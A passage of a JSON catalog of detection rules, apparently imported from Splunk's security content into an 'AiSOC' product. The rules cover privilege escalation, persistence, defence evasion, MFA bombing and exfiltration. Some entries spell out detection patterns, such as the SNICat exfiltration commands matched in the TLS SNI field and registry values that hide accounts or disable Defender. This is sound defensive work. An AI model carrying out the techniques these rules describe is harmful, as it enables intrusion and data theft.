access. This detection leverages data from Linux Auditd, focusing on process names and command-line arguments related to chmod. This activity is significant as it can indicate an attempt to escalate privileges or maintain persistence on a system. If confirmed malicious, an attacker could gain elevated access, potentially compromising sensitive data or critical system functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-setuid-using-chmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8230c407-1b47-4d95-ac2e-718bd6381386", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_setuid_using_chmod_utility.yml" } }, { "id": "splunk-security-content-823136f2-d755-4b6d-ae04-372b486a5808", "type": "detection", "name": "First Time Seen Running Windows Service", "description": "The following analytic detects the first occurrence of a Windows service running in your environment. It leverages Windows system event logs, specifically EventCode 7036, to identify services entering the \"running\" state. This activity is significant because the appearance of a new or previously unseen service could indicate the installation of unauthorized or malicious software. If confirmed malicious, this activity could allow an attacker to execute arbitrary code, maintain persistence, or escalate privileges within the environment. Monitoring for new services helps in early detection of potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/first-time-seen-running-windows-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "823136f2-d755-4b6d-ae04-372b486a5808", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/first_time_seen_running_windows_service.yml" } }, { "id": "splunk-security-content-824dd598-71be-4203-bc3b-024f4cda340e", "type": "detection", "name": "Windows Modify Registry Regedit Silent Reg Import", "description": "The following analytic detects the modification of the Windows registry using the regedit.exe application with the silent mode parameter. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because the silent mode allows registry changes without user confirmation, which can be exploited by adversaries to import malicious registry settings. If confirmed malicious, this could enable attackers to persist in the environment, escalate privileges, or manipulate system configurations, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-regedit-silent-reg-import.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "824dd598-71be-4203-bc3b-024f4cda340e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml" } }, { "id": "splunk-security-content-825fed20-309d-4fd1-8aaf-cd49c1bb093c", "type": "detection", "name": "Azure AD Global Administrator Role Assigned", "description": "The following analytic detects the assignment of the Azure AD Global Administrator role to a user. It leverages Azure Active Directory AuditLogs to identify when the \"Add member to role\" operation includes the \"Global Administrator\" role. This activity is significant because the Global Administrator role grants extensive access to data, resources, and settings, similar to a Domain Administrator in traditional AD environments. If confirmed malicious, this could allow an attacker to establish persistence, escalate privileges, and potentially gain control over Azure resources, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-global-administrator-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "825fed20-309d-4fd1-8aaf-cd49c1bb093c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_global_administrator_role_assigned.yml" } }, { "id": "splunk-security-content-826dbaae-a1e6-4c8c-b384-d16898956e73", "type": "detection", "name": "Okta Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication (MFA) requests for a single user within an Okta tenant. It triggers when more than 10 MFA attempts fail within 5 minutes, using Okta event logs to detect this pattern. This activity is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests, a technique used by threat actors like Lapsus and APT29. If confirmed malicious, this could lead to unauthorized access, potentially compromising sensitive information and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "826dbaae-a1e6-4c8c-b384-d16898956e73", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-8281ce42-5c50-11ec-82d2-acde48001122", "type": "detection", "name": "Java Class File download by Java User Agent", "description": "The following analytic identifies a Java user agent performing a GET request for a .class file from a remote site. It leverages web or proxy logs within the Web Datamodel to detect this activity. This behavior is significant as it may indicate exploitation attempts, such as those related to CVE-2021-44228 (Log4Shell). If confirmed malicious, an attacker could exploit vulnerabilities in the Java application, potentially leading to remote code execution and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/java-class-file-download-by-java-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8281ce42-5c50-11ec-82d2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/java_class_file_download_by_java_user_agent.yml" } }, { "id": "splunk-security-content-82d06410-134c-11eb-adc1-0242ac120002", "type": "detection", "name": "Detect SNICat SNI Exfiltration", "description": "The following analytic identifies the use of SNICat tool commands within the TLS SNI field, indicating potential data exfiltration attempts. It leverages Zeek SSL data to detect specific SNICat commands such as LIST, LS, SIZE, LD, CB, EX, ALIVE, EXIT, WHERE, and finito in the server_name field. This activity is significant as SNICat is a known tool for covert data exfiltration using TLS. If confirmed malicious, this could allow attackers to exfiltrate sensitive data undetected, posing a severe threat to data confidentiality and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-snicat-sni-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "82d06410-134c-11eb-adc1-0242ac120002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_snicat_sni_exfiltration.yml" } }, { "id": "splunk-security-content-82eb7f64-d219-4e21-acfe-956de84c1a35", "type": "detection", "name": "CrushFTP Authentication Bypass Exploitation", "description": "The following analytic detects potential exploitation of the CrushFTP authentication bypass vulnerability (CVE-2025-31161). This detection identifies suspicious command execution patterns associated with exploitation of this vulnerability, such as executing mesch.exe with specific arguments like b64exec or fullinstall. This activity is indicative of an attacker exploiting CVE-2025-31161 to gain unauthorized access to the CrushFTP server and perform post-exploitation activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059.003", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crushftp-authentication-bypass-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "82eb7f64-d219-4e21-acfe-956de84c1a35", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/crushftp_authentication_bypass_exploitation.yml" } }, { "id": "splunk-security-content-8309c3a8-4d34-48ae-ad66-631658214653", "type": "detection", "name": "Windows Kerberos Local Successful Logon", "description": "The following analytic identifies a local successful authentication event on a Windows endpoint using the Kerberos package. It detects EventCode 4624 with LogonType 3 and source address 127.0.0.1, indicating a login to the built-in local Administrator account. This activity is significant as it may suggest a Kerberos relay attack, a method attackers use to escalate privileges. If confirmed malicious, this could allow an attacker to gain unauthorized access to sensitive systems, execute arbitrary code, or create new accounts in Active Directory, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-kerberos-local-successful-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8309c3a8-4d34-48ae-ad66-631658214653", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_kerberos_local_successful_logon.yml" } }, { "id": "splunk-security-content-83317b08-155b-11ec-8e00-acde48001122", "type": "detection", "name": "Wmic Group Discovery", "description": "The following analytic identifies the use of `wmic.exe` to enumerate local groups on an endpoint. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs, including command-line details. Monitoring this activity is significant as it can indicate reconnaissance efforts by an attacker to understand group memberships, which could be a precursor to privilege escalation or lateral movement. If confirmed malicious, this activity could allow an attacker to map out privileged groups, aiding in further exploitation and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmic-group-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "83317b08-155b-11ec-8e00-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmic_group_discovery.yml" } }, { "id": "splunk-security-content-83458004-db60-4170-857d-8572f16f070b", "type": "detection", "name": "Windows Admon Default Group Policy Object Modified", "description": "The following analytic detects modifications to the default Group Policy Objects (GPOs) in an Active Directory environment. It leverages Splunk's Admon to monitor updates to the \"Default Domain Policy\" and \"Default Domain Controllers Policy.\" This activity is significant because changes to these default GPOs can indicate an adversary with privileged access attempting to gain further control, establish persistence, or deploy malware across multiple hosts. If confirmed malicious, such modifications could lead to widespread policy enforcement changes, unauthorized access, and potential compromise of the entire domain environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-admon-default-group-policy-object-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "83458004-db60-4170-857d-8572f16f070b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_admon_default_group_policy_object_modified.yml" } }, { "id": "splunk-security-content-834ba832-ad89-11eb-937d-acde48001122", "type": "detection", "name": "Hide User Account From Sign-In Screen", "description": "The following analytic detects a suspicious registry modification that hides a user account from the Windows Login screen. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist*\" with a value of \"0x00000000\". This activity is significant as it may indicate an adversary attempting to create a hidden admin account to avoid detection and maintain persistence on the compromised machine. If confirmed malicious, this could allow the attacker to maintain undetected access and control over the system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hide-user-account-from-sign-in-screen.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "834ba832-ad89-11eb-937d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/hide_user_account_from_sign_in_screen.yml" } }, { "id": "splunk-security-content-8351340b-ac0e-41ec-8b07-dd01bf32d6ea", "type": "detection", "name": "Windows Hijack Execution Flow Version Dll Side Load", "description": "The following analytic detects a process loading a version.dll file from a directory other than %windir%\\system32 or %windir%\\syswow64. This detection leverages Sysmon EventCode 7 to identify instances where an unsigned or improperly located version.dll is loaded. This activity is significant as it is a common technique used in ransomware and APT malware campaigns, including Brute Ratel C4, to execute malicious code via DLL side loading. If confirmed malicious, this could allow attackers to execute arbitrary code, maintain persistence, and potentially compromise the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hijack-execution-flow-version-dll-side-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8351340b-ac0e-41ec-8b07-dd01bf32d6ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hijack_execution_flow_version_dll_side_load.yml" } }, { "id": "splunk-security-content-8367cb99-bae1-4748-ae3b-0927bb381424", "type": "detection", "name": "GitHub Enterprise Repository Archived", "description": "The following analytic detects when a repository is archived in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for repository archival events by tracking actor details, repository information, and associated metadata. For a SOC, identifying repository archival is important as it could indicate attempts to make critical code inaccessible or preparation for repository deletion. While archiving is a legitimate feature, unauthorized archival of active repositories could signal account compromise, insider threats, or attempts to disrupt development operations. The impact of unauthorized repository archival includes loss of active development access, disruption to workflows and CI/CD pipelines, and potential business delays if critical repositories are affected. Additionally, archived repositories may be targeted for subsequent deletion, potentially resulting in permanent loss of intellectual property if proper backups are not maintained.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-repository-archived.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8367cb99-bae1-4748-ae3b-0927bb381424", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_repository_archived.yml" } }, { "id": "splunk-security-content-83776de4-921a-11eb-868a-acde48001122", "type": "detection", "name": "Disabling FolderOptions Windows Feature", "description": "The following analytic detects the modification of the Windows registry to disable the Folder Options feature, which prevents users from showing hidden files and file extensions. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFolderOptions\" with a value of \"0x00000001\". This activity is significant as it is commonly used by malware to conceal malicious files and deceive users with fake file extensions. If confirmed malicious, this could allow an attacker to hide their presence and malicious files, making detection and remediation more difficult.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-folderoptions-windows-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "83776de4-921a-11eb-868a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_folderoptions_windows_feature.yml" } }, { "id": "splunk-security-content-839ab790-a60a-4f81-bfb3-02567063f615", "type": "detection", "name": "Linux Deletion of SSL Certificate", "description": "The following analytic detects the deletion of SSL certificates on a Linux machine. It leverages filesystem event logs to identify when files with extensions .pem or .crt are deleted from the /etc/ssl/certs/ directory. This activity is significant because attackers may delete or modify SSL certificates to disable security features or evade defenses on a compromised system. If confirmed malicious, this behavior could indicate an attempt to disrupt secure communications, evade detection, or execute a destructive payload, potentially leading to significant security breaches and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deletion-of-ssl-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "839ab790-a60a-4f81-bfb3-02567063f615", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deletion_of_ssl_certificate.yml" } }, { "id": "splunk-security-content-841e2abc-0442-4e7f-b445-b22680632a08", "type": "detection", "name": "Windows Browser Process Launched with Unusual Flags", "description": "The following analytic detects the use of unusual browser flags, specifically --mute-audio and --do-not-elevate, which deviate from standard browser launch behavior. These flags may indicate automated scripts, testing environments, or attempts to modify browser functionality for silent operation or restricted privilege execution. Detection focuses on non-standard launch parameters, unexpected process behavior, or deviations from baseline configurations. Monitoring such flag usage helps identify potentially suspicious activity, misconfigurations, or policy violations, enabling security teams to investigate anomalies, ensure system compliance, and differentiate legitimate administrative or testing uses from unusual or unauthorized operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-browser-process-launched-with-unusual-flags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "841e2abc-0442-4e7f-b445-b22680632a08", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_browser_process_launched_with_unusual_flags.yml" } }, { "id": "splunk-security-content-8467d8cd-b0f9-46fa-ac84-a30ad138983e", "type": "detection", "name": "Windows Impair Defense Disable Defender Firewall And Network", "description": "The following analytic detects modifications in the Windows registry to disable firewall and network protection settings within Windows Defender Security Center. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the UILockdown registry value. This activity is significant as it may indicate an attempt to impair system defenses, potentially restricting users from modifying firewall or network protection settings. If confirmed malicious, this could allow an attacker to weaken the system's security posture, making it more vulnerable to further attacks and unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-defender-firewall-and-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8467d8cd-b0f9-46fa-ac84-a30ad138983e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_defender_firewall_and_network.yml" } }, { "id": "splunk-security-content-8470d755-0c13-45b3-bd63-387a373c10cf", "type": "detection", "name": "Reg exe Manipulating Windows Services Registry Keys", "description": "The following analytic detects the use of reg.exe to modify registry keys associated with Windows services and their configurations. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because unauthorized changes to service registry keys can indicate an attempt to establish persistence or escalate privileges. If confirmed malicious, this could allow an attacker to control service behavior, potentially leading to unauthorized code execution or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/reg-exe-manipulating-windows-services-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8470d755-0c13-45b3-bd63-387a373c10cf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/reg_exe_manipulating_windows_services_registry_keys.yml" } }, { "id": "splunk-security-content-85096389-a443-42df-b89d-200efbb1b560", "type": "detection", "name": "AWS S3 Exfiltration Behavior Identified", "description": "The following analytic identifies potential AWS S3 exfiltration behavior by correlating multiple risk events related to Collection and Exfiltration techniques. It leverages risk events from AWS sources, focusing on instances where two or more unique analytics and distinct MITRE ATT&CK IDs are triggered for a specific risk object. This activity is significant as it may indicate an ongoing data exfiltration attempt, which is critical for security teams to monitor. If confirmed malicious, this could lead to unauthorized access and theft of sensitive information, compromising the organization's data integrity and confidentiality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-s3-exfiltration-behavior-identified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85096389-a443-42df-b89d-200efbb1b560", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_s3_exfiltration_behavior_identified.yml" } }, { "id": "splunk-security-content-8551252d-b5b6-4b6e-8a82-51460aeb29a3", "type": "detection", "name": "DNS Kerberos Coercion", "description": "Detects DNS-based Kerberos coercion attacks where adversaries inject marshaled credential structures into DNS records to spoof SPNs and redirect authentication such as in CVE-2025-33073. This detection leverages suricata looking for specific CREDENTIAL_TARGET_INFORMATION structures in DNS queries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187", "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dns-kerberos-coercion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8551252d-b5b6-4b6e-8a82-51460aeb29a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/dns_kerberos_coercion.yml" } }, { "id": "splunk-security-content-8560de46-ea2d-4c69-8ca3-5b78b90f1338", "type": "detection", "name": "Windows AppX Deployment Full Trust Package Installation", "description": "The following analytic detects the installation of MSIX/AppX packages with full trust privileges. This detection leverages Windows event logs from the AppXDeployment-Server, specifically focusing on EventCode 400 which indicates a package deployment operation. Full trust packages are significant as they run with elevated privileges outside the normal AppX container restrictions, allowing them to access system resources that regular AppX packages cannot. Adversaries have been observed leveraging full trust MSIX packages to deliver malware, as documented in recent threat intelligence reports. If confirmed malicious, these packages could allow attackers to execute arbitrary code with elevated privileges, establish persistence, or deliver malware while evading traditional detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-appx-deployment-full-trust-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8560de46-ea2d-4c69-8ca3-5b78b90f1338", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_appx_deployment_full_trust_package_installation.yml" } }, { "id": "splunk-security-content-8567da9e-47f0-11ec-99a9-acde48001122", "type": "detection", "name": "Windows DISM Remove Defender", "description": "The following analytic detects the use of `dism.exe` to remove Windows Defender. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include specific parameters for disabling and removing Windows Defender. This activity is significant because adversaries may disable Defender to evade detection and carry out further malicious actions undetected. If confirmed malicious, this could lead to the attacker gaining persistent access, executing additional payloads, or exfiltrating sensitive data without being intercepted by Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dism-remove-defender.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8567da9e-47f0-11ec-99a9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dism_remove_defender.yml" } }, { "id": "splunk-security-content-85bc3f30-ca28-11eb-bd21-acde48001122", "type": "detection", "name": "PowerShell Loading DotNET into Memory via Reflection", "description": "The following analytic detects the use of PowerShell scripts to load .NET assemblies into memory via reflection, a technique often used in malicious activities such as those by Empire and Cobalt Strike. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command executed. This behavior is significant as it can indicate advanced attack techniques aiming to execute code in memory, bypassing traditional defenses. If confirmed malicious, this activity could lead to unauthorized code execution, privilege escalation, and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-loading-dotnet-into-memory-via-reflection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85bc3f30-ca28-11eb-bd21-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_loading_dotnet_into_memory_via_reflection.yml" } }, { "id": "splunk-security-content-85c7555a-05af-4322-81aa-76b4ddf52baa", "type": "detection", "name": "O365 Email Suspicious Behavior Alert", "description": "The following analytic identifies when one of O365 the built-in security detections for suspicious email behaviors are triggered. These alerts often indicate that an attacker may have compromised a mailbox within the environment. Any detections from built-in Office 365 capabilities should be monitored and responded to appropriately. Certain premium Office 365 capabilities further enhance these detection and response functions.", "version": "1.0.0", "author": 